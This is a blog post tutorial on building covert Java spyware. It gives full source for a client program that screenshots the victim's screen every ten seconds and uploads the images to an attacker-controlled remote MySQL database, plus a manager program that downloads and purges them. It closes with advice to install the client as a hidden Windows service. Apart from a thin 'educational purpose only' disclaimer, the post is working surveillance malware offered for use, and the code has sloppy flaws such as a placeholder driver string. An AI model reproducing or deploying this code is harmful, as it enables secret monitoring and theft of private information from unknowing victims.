Posted by
shantanu yadav
on
- Get link
- X
- Other Apps
According to wikipedia
Spyware is software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent, or that asserts control over a device without the consumer's knowledge.Spyware is basically used to transmit data from host's computer to the hacker without their prior knowledge.
[Before Starting and going any deep in to the topic i want to make it very clear that all the programs and coding describe below are for educational purpose only.If it causes any damage to the person who is using it or to the person on whom it is used author or the website takes no responsibility ]
Before Starting
This tutorial will tell you everything which you will need to make a fully packed spy ware for yourself.
It will provide you with all the program codes and links to the required software's.
What all you need
Before starting here is a checklist of tools and software you will be needed to make this spyware.
1)Java Development Kit(JDK)
2)MySQl connector for java.:- In order to use sql database in java program.
NOTE :- you need not to have a MySQL database.If you have it then also it will never be needed.
3)Any java IDE.
Here i am assuming that you have install and configure everything listed above if you have found in any problem in doing so then you could google it.
Spyware's working
Our spyware is simple and could be made easily with less coding.It regularly takes screen capture after a specific interval (may be 5 sec to 10 min per screen shot depending upon database size) of the client (where you have deploy the virus) and stores it on an online database which is administered by you.
There are two different programs which will work on two different platforms.
1) Our main virus program(Uploader.java) which will capture regular screen shot and upload it to database will run on the client machine.
2) Our manager program(Manager.java) will run on our machine and it will regularly download the screenshot from database and cleans the database for new screenshots to be uploaded. Need of an online free SQL database
I am sure that from our spyware working you could have guess out that this virus need a online database to function.Although there are many in the list you have to select a better and faster one with remote connections available(most important) .
You could google it to find one for you or check this list for top hosting sites.But still i think you should use
Free SQL Database, however it provides only 5 MB of space but it is fast and reliable.
Once you have created you account you can create a database and an email will be send to you with the following details :-
Database Host : -<Your database host>
Database Username :-<Your database username>
Database Password :-<Your database password>
Just copy it somewhere as you will need it very often.
Designing Our Database
Our database is very simple and contains only 1 table with 2 column (id ) and (imagedata) where id stores image index and data stores image itself.
Below in your account page there is a link for phpmyadmin click there a login form will be shown as below.
Where ,
server is Database Host
username is Database Username
and Password is Database password which you got from the Hosting site
Once you have successfully login then on the menu tab ,select your database and then you will find (SQL) menu just click on it and run this sql code.
server is Database Host
username is Database Username
and Password is Database password which you got from the Hosting site
Once you have successfully login then on the menu tab ,select your database and then you will find (SQL) menu just click on it and run this sql code.
CREATE TABLE `images` ( `id` int(10) unsigned NOT NULL auto_increment, `image` longblob NOT NULL, PRIMARY KEY (`id`) );
This will create table images in your database with two columns id and image.
Here comes the end of database designing.
Programming client side virus,Uploder.java
This class uses the Robot class of java to capture screen shot and store it onto the database .
Here is the code for the Uploder.java file.
@author Quadgen -shashank sahu
package databaseVirus; import java.awt.AWTException; import java.awt.Dimension; import java.awt.Rectangle; import java.awt.Robot; import java.awt.Toolkit; import java.awt.image.BufferedImage; import java.io.ByteArrayOutputStream; import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.SQLException; import javax.imageio.ImageIO; class Uploder { public static Connection getConnection() { String driver = "YOUR DATBASE HOST HERE"; String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>"; String u = "<DATABASE USERNAME>"; String p = "<DATABASE PASSWORD>"; try { Class.forName(driver); } catch (ClassNotFoundException e) { getConnection(); } Connection conn = null; try { conn = DriverManager.getConnection(url, u, p); } catch (SQLException e) { getConnection(); } return conn; } static Connection conn; public static void main(String args[])throws Exception { conn = getConnection(); int fre=10000;//10 seconds, defines screen shot per 10 seconds while(true) { try{ BufferedImage originalImage=getImage(); ByteArrayOutputStream baos = new ByteArrayOutputStream(); ImageIO.write(originalImage, "jpg", baos); byte[] imageInByte = baos.toByteArray(); String insertImageSql = "INSERT INTO " + "images(image)" + " VALUES(?)"; PreparedStatement preparedStatement = conn.prepareStatement(insertImageSql); preparedStatement.setBytes(1, imageInByte); preparedStatement.executeUpdate(); Thread.sleep(fre); } catch(Exception e) { continue; } } } public static BufferedImage getImage() throws AWTException { Dimension screenDim = Toolkit.getDefaultToolkit().getScreenSize(); Robot robot = null; robot = new Robot(); BufferedImage image = robot.createScreenCapture(new Rectangle(0, 0, (int) screenDim.getWidth(),(int) screenDim.getHeight())); return image; } }dfdfd
NOTE
You have to enter your own Database USERNAME and PASSWORD as and when required.Also you could change the fre(frequency ) variable as per you requirement don't set it too low otherwise you will end your 5 MB space in a minute or two.(Remember 1sec=1000 milli seconds)
The above program is designed in a way if some error occur which might be no internet connection or library load failure or could not capture image or database space is full then it will automatically handel it and by entering into a infinite loop until the exception ends.(E.g. Internet Connection regained).
Programming manager program (Manager.java)
This program will be executed by the hacker it will clean the database after successfully downloading and storing all the screen shot uploaded by the client.
Manager.java
import java.io.FileOutputStream; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class Manager { static int start,end; public static Connection getConnection() { String driver = "YOUR DATBASE HOST HERE"; String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>"; String u = "<DATABASE USERNAME>"; String p = "<DATABASE PASSWORD>"; try { Class.forName(driver); } catch (ClassNotFoundException e) { getConnection(); } Connection conn = null; try { conn = DriverManager.getConnection(url, u, p); } catch (SQLException e) { getConnection(); } return conn; } static Connection conn; public static void main()throws Exception { conn=getConnection(); Statement stmt = conn.createStatement(); ResultSet rs = stmt.executeQuery("SELECT * FROM images"); int id = 0; start=0; end=0; if (rs.next() == false) { System.out.println("No image is found in database "); } else { start=rs.getInt(1); do { id = rs.getInt(1); byte[] image = rs.getBytes(2); FileOutputStream fileOutputStream = new FileOutputStream("D:/"+id+".png"); fileOutputStream.write(image); System.out.println("\nImage successully retrieved from database. Id of image:"+ id ); fileOutputStream.close(); } while (rs.next()); } end=id; String sql = "DELETE FROM images " + "WHERE id<="+id+""; stmt.executeUpdate(sql); System.out.print("deleted record "+start+" to "+id); System.out.print((id-start+1)+"files Downloaded"); stmt.close(); rs.close(); conn.close(); } }
Packaging and deploying
You could now easily convert your Uploder.java program into a window service by the tools which are available on net.A window service could run on the host when the computer start and stops when the computer stops.It also runs on the background so there is no need for user interference.
Look here if you want to know how to do that.
Hope this help you if yes then tell more of your friends about it.Enjoy.
Comments
Post a Comment